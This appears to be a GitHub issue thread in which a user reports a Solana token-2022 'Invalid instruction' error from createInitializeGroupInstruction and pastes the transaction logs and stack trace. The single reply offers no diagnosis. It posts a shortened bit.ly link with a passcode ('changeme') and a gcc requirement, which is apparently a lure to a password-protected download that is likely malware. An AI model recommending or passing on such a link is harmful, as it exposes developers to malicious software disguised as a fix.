### ISSUE TITLE
'Program log: Error: Invalid instruction' is happen while caling createInitializeGroupInstruction

### ISSUE THREAD

**Issue by Lu-Derik** [Unboxed-Software/solana-lab-member-pointer#1]
Hi,

I received  'Program log: Error: Invalid instruction' while caling createInitializeGroupInstruction. And someone said, The token group extension in token-2022 has not been deployed yet.

Refer to https://solana.stackexchange.com/questions/14740/anchor-spl-token-group-initialize-invalid-instruction

This is error information.

/home/ldru/solana/solana-lab-group-member/node_modules/@solana/web3.js/src/connection.ts:6043
      throw new SendTransactionError({
            ^

SendTransactionError: Simulation failed. 
Message: Transaction simulation failed: Error processing Instruction 4: custom program error: 0xc. 
Logs: 
[
  "Program TokenzQdBNbLqP5VEhdkAS6EPFLC1PHnBqCXEpPxuEb consumed 906 of 1199009 compute units",
  "Program TokenzQdBNbLqP5VEhdkAS6EPFLC1PHnBqCXEpPxuEb success",
  "Program TokenzQdBNbLqP5VEhdkAS6EPFLC1PHnBqCXEpPxuEb invoke [1]",
  "Program log: Instruction: InitializeMint",
  "Program TokenzQdBNbLqP5VEhdkAS6EPFLC1PHnBqCXEpPxuEb consumed 2260 of 1198103 compute units",
  "Program TokenzQdBNbLqP5VEhdkAS6EPFLC1PHnBqCXEpPxuEb success",
  "Program TokenzQdBNbLqP5VEhdkAS6EPFLC1PHnBqCXEpPxuEb invoke [1]",
  "Program log: Error: Invalid instruction",
  "Program TokenzQdBNbLqP5VEhdkAS6EPFLC1PHnBqCXEpPxuEb consumed 712 of 1195843 compute units",
  "Program TokenzQdBNbLqP5VEhdkAS6EPFLC1PHnBqCXEpPxuEb failed: custom program error: 0xc"
]. 
Catch the `SendTransactionError` and call `getLogs()` on it for full details.
    at Connection.sendEncodedTransaction (/home/ldru/solana/solana-lab-group-member/node_modules/@solana/web3.js/src/connection.ts:6043:13)
    at process.processTicksAndRejections (node:internal/process/task_queues:95:5)
    at Connection.sendRawTransaction (/home/ldru/solana/solana-lab-group-member/node_modules/@solana/web3.js/src/connection.ts:5999:20)
    at Connection.sendTransaction (/home/ldru/solana/solana-lab-group-member/node_modules/@solana/web3.js/src/connection.ts:5987:12)
    at sendAndConfirmTransaction (/home/ldru/solana/solana-lab-group-member/node_modules/@solana/web3.js/src/utils/send-and-confirm-transaction.ts:36:21)
    at async createTokenGroup (file:///home/ldru/solana/solana-lab-group-member/[eval1]:91:22)
    at async file:///home/ldru/solana/solana-lab-group-member/[eval1]:224:17 {
  signature: '',
  transactionMessage: 'Transaction simulation failed: Error processing Instruction 4: custom program error: 0xc',
  transactionLogs: [
    'Program 11111111111111111111111111111111 invoke [1]',
    'Program 11111111111111111111111111111111 success',
    'Program TokenzQdBNbLqP5VEhdkAS6EPFLC1PHnBqCXEpPxuEb invoke [1]',
    'Program log: GroupPointerInstruction::Initialize',
    'Program TokenzQdBNbLqP5VEhdkAS6EPFLC1PHnBqCXEpPxuEb consumed 841 of 1199850 compute units',
    'Program TokenzQdBNbLqP5VEhdkAS6EPFLC1PHnBqCXEpPxuEb success',
    'Program TokenzQdBNbLqP5VEhdkAS6EPFLC1PHnBqCXEpPxuEb invoke [1]',
    'Program log: MetadataPointerInstruction::Initialize',
    'Program TokenzQdBNbLqP5VEhdkAS6EPFLC1PHnBqCXEpPxuEb consumed 906 of 1199009 compute units',
    'Program TokenzQdBNbLqP5VEhdkAS6EPFLC1PHnBqCXEpPxuEb success',
    'Program TokenzQdBNbLqP5VEhdkAS6EPFLC1PHnBqCXEpPxuEb invoke [1]',
    'Program log: Instruction: InitializeMint',
    'Program TokenzQdBNbLqP5VEhdkAS6EPFLC1PHnBqCXEpPxuEb consumed 2260 of 1198103 compute units',
    'Program TokenzQdBNbLqP5VEhdkAS6EPFLC1PHnBqCXEpPxuEb success',
    'Program TokenzQdBNbLqP5VEhdkAS6EPFLC1PHnBqCXEpPxuEb invoke [1]',
    'Program log: Error: Invalid instruction',
    'Program TokenzQdBNbLqP5VEhdkAS6EPFLC1PHnBqCXEpPxuEb consumed 712 of 1195843 compute units',
    'Program TokenzQdBNbLqP5VEhdkAS6EPFLC1PHnBqCXEpPxuEb failed: custom program error: 0xc'
  ]
}

**Comment by maiarafag** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler
